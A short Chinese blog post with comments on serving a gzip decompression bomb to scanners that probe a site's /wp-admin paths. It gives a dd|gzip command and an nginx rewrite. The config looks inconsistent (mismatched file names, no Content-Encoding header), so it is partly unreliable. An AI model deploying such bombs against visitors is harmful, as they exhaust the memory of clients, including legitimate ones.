看到访问日志里面总有脚本小子扫管理页面,不如丢个炸弹上去玩玩。
生成一个gzip炸弹
dd if=/dev/zero bs=1M count=1024 | gzip > bomb.gzip
修改nginx
地址重写
location ~ /wp-admin {
if (!-e $request_filename) {
rewrite ^/.* /path/to/bomb.gzip;
}
include fastcgi-php.conf;
}
location ~ 1g\.bomb\.gzip {
default_type 'text/html';
}
具体自由发挥,根据自己的站点调整即可。(滑稽脸)
版权属于:一名宅。
本文链接:https://zhaiyiming.com/archives/make-a-gzip-bomb.html
转载时须注明出处及本声明
这个好玩。。。用了你的统计插件,我也发现有人扫,很不爽
额……现在爬站不都是异步的么……
bomb 的原理是压缩后 1MB 解压后 1GB 的文件。因为在如果返回 gzip 类型的文件的话,客户端会自动解压。这种炸弹会大量地消耗客户端的内存。